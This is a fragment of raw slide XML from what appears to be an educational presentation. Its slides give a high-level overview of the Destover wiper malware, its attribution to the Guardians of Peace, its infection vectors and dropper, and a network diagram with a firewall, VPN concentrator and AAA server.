          <p:cNvCxnSpPr>
            <a:stCxn id="1030" idx="3"/>
            <a:endCxn id="1029" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858449" y="774848"/>
            <a:ext cx="471300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1028" idx="0"/>
            <a:endCxn id="1030" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6686297" y="1028287"/>
            <a:ext cx="0" cy="434100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1030" idx="2"/>
            <a:endCxn id="1028" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686300" y="1028323"/>
            <a:ext cx="0" cy="434100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036" name="Google Shape;1036;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234825" y="1194525"/>
            <a:ext cx="8856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000"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1037" name="Google Shape;1037;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234825" y="600900"/>
            <a:ext cx="8856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000"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Google Shape;1038;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010850" y="163575"/>
            <a:ext cx="13509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000"/>
              <a:t>Firewall /           VPN Concentrator</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039" name="Google Shape;1039;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882300" y="1544900"/>
            <a:ext cx="8856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000"/>
              <a:t>AAA Server</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040" name="Google Shape;1040;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7546000" y="521375"/>
            <a:ext cx="8856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000"/>
              <a:t>Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000"/>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="cybersecurity threats phishing scam and hacker attack illustrated with computer hack and message icon vector png, Scammer, Hack, Credit PNG and Vector" id="1041" name="Google Shape;1041;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1543625" y="1945525"/>
            <a:ext cx="885600" cy="885600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Statutory Cyber Incident Reporting In The USA | BC Training" id="1042" name="Google Shape;1042;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2458" l="1635" r="993" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5466125" y="3225575"/>
            <a:ext cx="2018676" cy="1338625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="x-email-encrypted | EFF Photos | Flickr" id="1043" name="Google Shape;1043;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="20160" r="20769" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2873513" y="2013481"/>
            <a:ext cx="885701" cy="749682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1044" name="Google Shape;1044;p44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1041" idx="3"/>
            <a:endCxn id="1043" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429225" y="2388325"/>
            <a:ext cx="4443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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1020"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1027"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1036"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1038"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1039"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1039"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1035"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1022"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1041"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1041"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1023"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1044"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1043"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1024"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1025"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="withEffect" presetClass="entr" presetID="10" presetSubtype="0">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1042"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Destover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="904" name="Google Shape;904;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="1586525"/>
            <a:ext cx="7020600" cy="390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 sz="2300"/>
              <a:t>Also known as “Wipall”</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="905" name="Google Shape;905;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="2348913"/>
            <a:ext cx="7020600" cy="390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 sz="2300"/>
              <a:t>Wiper Malware - highly destructive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396050" y="3111300"/>
            <a:ext cx="7020600" cy="390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 sz="2300"/>
              <a:t>GOP - Guardians of Peace</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="-374650" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2300"/>
              <a:t>Sponsored by North Korea</a:t>
            </a:r>
            <a:endParaRPr b="1"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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3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Vectors &amp; Infection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1322700"/>
            <a:ext cx="38520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Entry Point</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Phishing emails</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Vulnerabilities in RATs (credential-only authentication)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="cybersecurity threats phishing scam and hacker attack illustrated with computer hack and message icon vector png, Scammer, Hack, Credit PNG and Vector" id="913" name="Google Shape;913;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4918175" y="2066950"/>
            <a:ext cx="1244225" cy="1244225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Google Shape;914;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5248775" y="595200"/>
            <a:ext cx="2774925" cy="933250"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutput">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D8313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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>dropper.exe</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="915" name="Google Shape;915;p36" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5863575" y="3473975"/>
            <a:ext cx="1444549" cy="1444549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="916" name="Google Shape;916;p36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="914" idx="3"/>
            <a:endCxn id="913" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5540345" y="1528450"/>
            <a:ext cx="818400" cy="538500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="917" name="Google Shape;917;p36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="913" idx="3"/>
            <a:endCxn id="918" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162400" y="2689062"/>
            <a:ext cx="617100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="919" name="Google Shape;919;p36"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="918" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6892187" y="3293900"/>
            <a:ext cx="509400" cy="438900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="network remote access icon png, Local, Icon remote access vector hd png images" id="918" name="Google Shape;918;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18866" l="16282" r="15704" t="15004"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6779475" y="2084225"/>
            <a:ext cx="1244225" cy="1209675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Google Shape;920;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2822150"/>
            <a:ext cx="38520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Dropper Download</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Nunito"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en"/>
              <a:t>diskpartmg16.exe</a:t>
            </a:r>
            <a:endParaRPr b="1"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="913"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="918"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="914"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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par>
                                <p:cTn fill="hold" nodeType="with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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="919"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
